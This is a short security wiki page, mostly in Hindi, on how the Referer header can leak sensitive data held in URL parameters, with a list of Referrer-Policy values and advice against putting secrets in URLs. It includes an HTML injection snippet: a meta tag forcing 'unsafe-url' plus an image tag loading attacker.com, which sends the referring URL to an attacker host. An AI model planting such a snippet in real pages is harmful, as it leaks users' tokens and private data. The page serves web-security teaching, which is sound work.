2.5 KiB
{{#include ./banners/hacktricks-training.md}}
Referrer headers and policy
Referrer वह हेडर है जिसका उपयोग ब्राउज़रों द्वारा यह संकेत करने के लिए किया जाता है कि कौन सा पिछला पृष्ठ देखा गया था।
Sensitive information leaked
यदि किसी समय एक वेब पृष्ठ के भीतर कोई संवेदनशील जानकारी GET अनुरोध पैरामीटर पर स्थित है, यदि पृष्ठ में बाहरी स्रोतों के लिए लिंक हैं या एक हमलावर उपयोगकर्ता को एक URL पर जाने के लिए मजबूर/सुझाव देने में सक्षम है जो हमलावर द्वारा नियंत्रित है। यह नवीनतम GET अनुरोध के भीतर संवेदनशील जानकारी को निकालने में सक्षम हो सकता है।
Mitigation
आप ब्राउज़र को एक Referrer-policy का पालन करने के लिए कह सकते हैं जो संवेदनशील जानकारी को अन्य वेब अनुप्रयोगों में भेजने से रोक सकती है:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Counter-Mitigation
आप इस नियम को एक HTML मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को एक HTML इंजेक्शन का लाभ उठाने की आवश्यकता है):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
रक्षा
कभी भी किसी संवेदनशील डेटा को GET पैरामीटर या URL में पथ के अंदर न रखें।
{{#include ./banners/hacktricks-training.md}}